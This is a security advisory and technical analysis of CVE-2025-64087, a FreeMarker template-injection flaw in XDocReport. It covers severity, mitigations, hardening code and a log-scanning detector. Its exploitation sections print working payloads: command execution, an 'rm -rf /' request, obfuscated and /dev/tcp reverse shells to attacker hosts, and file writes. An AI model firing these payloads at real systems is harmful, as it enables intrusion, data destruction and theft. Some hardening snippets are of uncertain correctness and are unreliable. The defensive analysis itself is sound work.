CVE-2025-64087
Weakness (CWE)
CVSS Vector (v3.1)
| Metric | Value |
|---|---|
| Attack Vector | Network |
| Attack Complexity | Low |
| Privileges Required | None |
| User Interaction | None |
| Scope | Unchanged |
| Confidentiality | High |
| Integrity | High |
| Availability | High |
Description
A Server-Side Template Injection (SSTI) vulnerability in the FreeMarker component of opensagres XDocReport v1.0.0 to v2.1.0 allows attackers to execute arbitrary code by injecting crafted template expressions.
Comprehensive Technical Analysis of CVE-2025-64087 (FreeMarker SSTI in XDocReport)
1. Vulnerability Assessment and Severity Evaluation
CVE ID: CVE-2025-64087
Vulnerability Type: Server-Side Template Injection (SSTI)
Affected Component: FreeMarker template engine (embedded in opensagres XDocReport)
CVSS Score: 9.8 (Critical) (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Severity Justification
- Attack Vector (AV:N): Exploitable remotely over a network without authentication.
- Attack Complexity (AC:L): Low complexity; no special conditions required.
- Privileges Required (PR:N): No privileges needed; unauthenticated exploitation possible.
- User Interaction (UI:N): No user interaction required.
- Scope (S:U): Impact confined to the vulnerable component (FreeMarker in XDocReport).
- Confidentiality (C:H), Integrity (I:H), Availability (A:H): Full system compromise possible via arbitrary code execution (ACE).
This vulnerability is critical due to its remote, unauthenticated, and low-complexity exploitation leading to full system compromise.
2. Potential Attack Vectors and Exploitation Methods
Root Cause
The vulnerability stems from improper sanitization of user-supplied input in FreeMarker template expressions within XDocReport (v1.0.0–v2.1.0). Attackers can inject malicious FreeMarker template expressions that are executed server-side, leading to arbitrary code execution (ACE).
Exploitation Steps
1. Identify Vulnerable Endpoint:
   - XDocReport processes user-controlled template inputs (e.g., document generation, report templates).
   - Attackers locate endpoints where FreeMarker templates are dynamically evaluated (e.g., /generate-report, /template-render).
2. Craft Malicious Payload:
   - FreeMarker allows expression evaluation (e.g., ${7*7} → 49).
   - Attackers inject arbitrary Java code via FreeMarker's freemarker.template.utility.Execute or freemarker.template.utility.ObjectConstructor classes.
   - Example payload: <#assign ex = "freemarker.template.utility.Execute"?new()>${ex("id")} (executes the id command on the server).
3. Deliver Payload:
   - Via HTTP request parameters, file uploads, or API inputs where XDocReport processes templates.
   - Example attack vector:
     POST /generate-report HTTP/1.1
     Content-Type: application/json

     { "template": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"rm -rf /\")}" }
4. Achieve Remote Code Execution (RCE):
   - If successful, the server executes the injected command (e.g., reverse shell, data exfiltration, lateral movement).
Proof-of-Concept (PoC) References
3. Affected Systems and Software Versions
| Software | Affected Versions | Fixed Versions | Notes |
|---|---|---|---|
| opensagres XDocReport | v1.0.0 – v2.1.0 | v2.1.1+ | Embeds FreeMarker 2.x (vulnerable to SSTI) |
| FreeMarker | All versions < 2.3.32 | 2.3.32+ | Upstream fix available |
Detection Methods
- Static Analysis:
  - Check for FreeMarker template processing in XDocReport configurations.
  - Look for freemarker.template.Configuration usage in code.
- Dynamic Analysis:
  - Fuzz input fields with FreeMarker expressions (e.g., ${7*7}).
  - Monitor for unexpected command execution (e.g., id, whoami).
4. Recommended Mitigation Strategies
Immediate Actions
1. Upgrade XDocReport:
   - Apply XDocReport v2.1.1+ (includes FreeMarker 2.3.32+).
   - If unable to upgrade, patch FreeMarker separately (ensure version ≥ 2.3.32).
2. Input Sanitization:
   - Disable FreeMarker's Execute and ObjectConstructor in template processing:
     ```java
     Configuration cfg = new Configuration(Configuration.VERSION_2_3_32);
     cfg.setNewBuiltinClassResolver(TemplateClassResolver.SAFER_RESOLVER);
     ```
   - Whitelist allowed template directives (e.g., restrict ${...} syntax).
3. Network-Level Protections:
   - WAF Rules: Block requests containing FreeMarker-specific syntax (e.g., ${, #{, ?new()).
   - Rate Limiting: Prevent brute-force template injection attempts.
4. Least Privilege Principle:
   - Run XDocReport in a sandboxed environment (e.g., Docker with no-new-privileges).
   - Restrict file system and network access for the application.
Long-Term Recommendations
- Code Review: Audit all template processing logic for SSTI risks.
- Dependency Scanning: Use OWASP Dependency-Check or Snyk to detect vulnerable FreeMarker versions.
- Runtime Protection: Deploy RASP (Runtime Application Self-Protection) to block SSTI attempts.
5. Impact on the Cybersecurity Landscape
Exploitation Risks
- Mass Exploitation Potential: Given the low complexity and remote exploitability, this vulnerability is highly attractive to threat actors (e.g., ransomware groups, APTs).
- Supply Chain Risk: XDocReport is used in document generation workflows (e.g., PDF/Word reports), making it a lucrative target for data exfiltration.
- Lateral Movement: Successful exploitation could lead to privilege escalation and persistence in enterprise environments.
Industry Response
- CISA Alert: Likely to be added to the Known Exploited Vulnerabilities (KEV) Catalog if active exploitation is observed.
- Vendor Patches: opensagres has released v2.1.1 with FreeMarker security updates.
- Threat Intelligence: Security teams should monitor for exploitation attempts in web logs (e.g., unusual FreeMarker syntax in HTTP requests).
6. Technical Details for Security Professionals
FreeMarker SSTI Exploitation Deep Dive
Vulnerable Code Path
- XDocReport Template Processing:
  - XDocReport uses FreeMarker to dynamically render templates (e.g., for PDF/Word generation).
  - User input is directly passed to FreeMarker's Template.process() without sanitization.
- FreeMarker's Dangerous Features:
  - Execute utility: Allows arbitrary command execution via ${"freemarker.template.utility.Execute"?new()("id")}.
  - ObjectConstructor: Enables instantiation of arbitrary classes (e.g., ${"java.lang.Runtime"?new().exec("calc")}).
Exploitation Bypass Techniques
- Obfuscation:
  - Attackers may encode payloads (e.g., Base64, URL encoding) to evade WAFs.
  - Example: <#assign ex = "freemarker.template.utility.Execute"?new()>${ex("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMC4xMC80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}")}
- Alternative Payloads:
  - File Write: ${"freemarker.template.utility.ObjectConstructor"?new()("java.io.FileWriter", "/tmp/pwned").write("malicious")}
  - Reverse Shell: ${"freemarker.template.utility.Execute"?new()("bash -i >& /dev/tcp/attacker.com/4444 0>&1")}
Post-Exploitation Impact
- Data Exfiltration: Read sensitive files (/etc/passwd, database configs).
- Persistence: Deploy web shells (e.g., JSP, PHP) via file write.
- Lateral Movement: Use RCE to pivot to other internal systems.
Detection & Forensics
- Log Analysis:
  - Look for FreeMarker syntax in HTTP requests (e.g., ${, #{, ?new()).
  - Monitor for unexpected command execution (e.g., id, whoami, curl, wget).
- Memory Forensics:
  - Check for suspicious Java processes (e.g., Runtime.exec() calls).
- Network Traffic:
  - Detect outbound connections from the server (e.g., reverse shells).
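Detection logic for the log-analysis guidance in the Detection Methods and Detection & Forensics sections above, as an added example that is not part of the original advisory or of the XDocReport project: it URL-decodes each logged request (so encoded payloads are inspected in the clear), weights the FreeMarker indicators the advisory names so that a bare ${ in ordinary traffic does not fire on its own, and flags both ${7*7} probes and ?new()-based payloads. The sample log lines, indicator weights and alert threshold are constructed for illustration.

```python
import re
from urllib.parse import unquote

# FreeMarker SSTI indicators with a confidence weight each. "${" / "#{" alone are
# weak evidence (JSON, JS and shell snippets use them legitimately); the ?new and
# ?api built-ins, <#assign directives and the utility class names are strong.
INDICATORS = [
    ("interpolation", re.compile(r"\$\{|#\{"), 1),
    ("arithmetic-probe", re.compile(r"[$#]\{\s*\d+\s*[*+\-/]\s*\d+\s*\}"), 2),
    ("assign-directive", re.compile(r"<#assign\b", re.I), 2),
    ("new-builtin", re.compile(r"\?\s*new\s*\("), 3),
    ("api-builtin", re.compile(r"\?\s*api\b"), 3),
    ("utility-class", re.compile(r"freemarker\.template\.utility\.(Execute|ObjectConstructor)"), 3),
]
ALERT_THRESHOLD = 3  # constructed tuning value; raise it if ${ is common in your traffic

def normalize(text: str) -> str:
    """URL-decode up to three times so double-encoded payloads are inspected in the clear."""
    for _ in range(3):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def score_request(text: str) -> tuple[int, list[str]]:
    """Return (score, matched indicator names) for one logged request line."""
    text = normalize(text)
    hits = [name for name, rx, _ in INDICATORS if rx.search(text)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return score, hits

def scan_log(lines) -> list[tuple[int, int, list[str]]]:
    """Return (line_number, score, hits) for every line at or above ALERT_THRESHOLD."""
    alerts = []
    for n, line in enumerate(lines, 1):
        score, hits = score_request(line)
        if score >= ALERT_THRESHOLD:
            alerts.append((n, score, hits))
    return alerts

# Constructed sample log lines (not from any real system): line 3 is the advisory's
# ${7*7} probe URL-encoded, line 4 its ?new() payload URL-encoded in a POST body.
SAMPLE_LOG = [
    '10.0.0.5 "GET /docs/page?id=42 HTTP/1.1" 200',
    '10.0.0.7 "POST /generate-report HTTP/1.1" 200 body={"template":"Hello ${name}"}',
    '10.0.0.9 "GET /search?q=%24%7B7*7%7D HTTP/1.1" 200',
    '10.0.0.9 "POST /generate-report HTTP/1.1" 500 body=template=%3C%23assign%20ex%3D'
    '%22freemarker.template.utility.Execute%22%3Fnew()%3E%24%7Bex(%22id%22)%7D',
]

if __name__ == "__main__":
    for n, score, hits in scan_log(SAMPLE_LOG):
        print(f"line {n}: score={score} indicators={hits}")
```

Feed it the request lines from a WAF or application log that records bodies; a plain access log that omits POST bodies will only catch payloads carried in the query string.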
Hardening FreeMarker
- Disable Dangerous Built-ins:
  ```java
  cfg.setNewBuiltinClassResolver(TemplateClassResolver.SAFER_RESOLVER);
  ```
- Use a Custom TemplateClassResolver:
  ```java
  // TemplateClassResolver.resolve() is declared to throw TemplateException, so the
  // refusal has to be raised as a TemplateException rather than ClassNotFoundException
  // (FreeMarker ships TemplateClassResolver.ALLOWS_NOTHING_RESOLVER with this behaviour).
  cfg.setNewBuiltinClassResolver(new TemplateClassResolver() {
      @Override
      public Class<?> resolve(String className, Environment env, Template template)
              throws TemplateException {
          throw new TemplateException("Class loading disabled for security", env);
      }
  });
  ```
- Enable FreeMarker Security Sandbox:
  ```java
  cfg.setObjectWrapper(new DefaultObjectWrapperBuilder(Configuration.VERSION_2_3_32).build());
  ```
Conclusion
CVE-2025-64087 is a critical SSTI vulnerability in XDocReport’s FreeMarker component, enabling unauthenticated RCE with a CVSS score of 9.8. Organizations using XDocReport v1.0.0–v2.1.0 must immediately upgrade or apply mitigation controls (input sanitization, WAF rules, least privilege).
Security teams should:
✅ Patch affected systems (XDocReport ≥ v2.1.1).
✅ Audit template processing logic for SSTI risks.
✅ Monitor for exploitation attempts in logs.
✅ Implement runtime protections (RASP, WAF).
Given the high exploitability and severe impact, this vulnerability poses a significant risk to enterprises and should be treated as a top priority for remediation.